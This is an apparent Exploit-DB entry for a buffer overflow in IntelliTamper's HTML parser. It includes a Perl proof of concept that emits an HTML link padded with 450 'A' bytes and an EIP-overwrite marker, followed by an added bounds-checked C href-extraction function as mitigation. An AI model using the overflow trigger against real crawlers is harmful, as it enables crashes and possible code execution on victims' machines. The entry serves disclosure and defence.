Vendor: IntelliTamper
By: k`sOSe
CVSS: 7.5 HIGH
Buffer Overflow
CWE: 119
Product Name: IntelliTamper
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

This exploit targets a buffer overflow in the HTML parser of IntelliTamper. It is triggered by placing a properly formatted HTML file on a website and running IntelliTamper against it.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.

use warnings;
use strict;

my $evil_html   =       '<html><head><title>ph33r</title></head><body>' .
                        '<a href="http://google.it/' .
                        "\x41" x 450 .
                        "\x42" x 4 . # EIP
                        '.htm">ph33r</a>' .
                        "</body></html>";

print $evil_html;

# milw0rm.com [2008-07-21]
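
The following is an added example, not part of the original entry and not IntelliTamper's code (the page does not show the parser): a bounds-checked copy of an anchor's href value into a fixed buffer, which is the length validation the mitigation above calls for. The function name extract_href, the status codes and the 256-byte buffer size are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define HREF_MAX 256 /* assumed capacity; the real parser's buffer size is not on the page */

enum href_status { HREF_OK = 0, HREF_NOT_FOUND = -1, HREF_UNTERMINATED = -2, HREF_TOO_LONG = -3 };

/* Copy the first double-quoted href value found in `html` into `out`
 * (capacity `cap` bytes). The length is measured before any byte is
 * written, and an oversized value is rejected rather than truncated,
 * so `out` cannot be overrun whatever the remote page contains. */
int extract_href(const char *html, char *out, size_t cap)
{
    static const char key[] = "href=\"";
    const char *start, *end;
    size_t len;

    if (html == NULL || out == NULL || cap == 0)
        return HREF_NOT_FOUND;
    out[0] = '\0';                     /* defined contents on every error path */

    start = strstr(html, key);
    if (start == NULL)
        return HREF_NOT_FOUND;
    start += sizeof(key) - 1;          /* skip past href=" */

    end = strchr(start, '"');
    if (end == NULL)
        return HREF_UNTERMINATED;      /* no closing quote: never copy to end of input */

    len = (size_t)(end - start);
    if (len >= cap)
        return HREF_TOO_LONG;          /* value plus NUL terminator would not fit */

    memcpy(out, start, len);
    out[len] = '\0';
    return HREF_OK;
}

int main(void)
{
    /* Constructed input: an ordinary anchor that fits the buffer. */
    char out[HREF_MAX];
    return extract_href("<a href=\"http://example.com/a.htm\">x</a>", out, sizeof out);
}
```

Rejecting instead of truncating also keeps the crawler from requesting a URL other than the one the page actually linked.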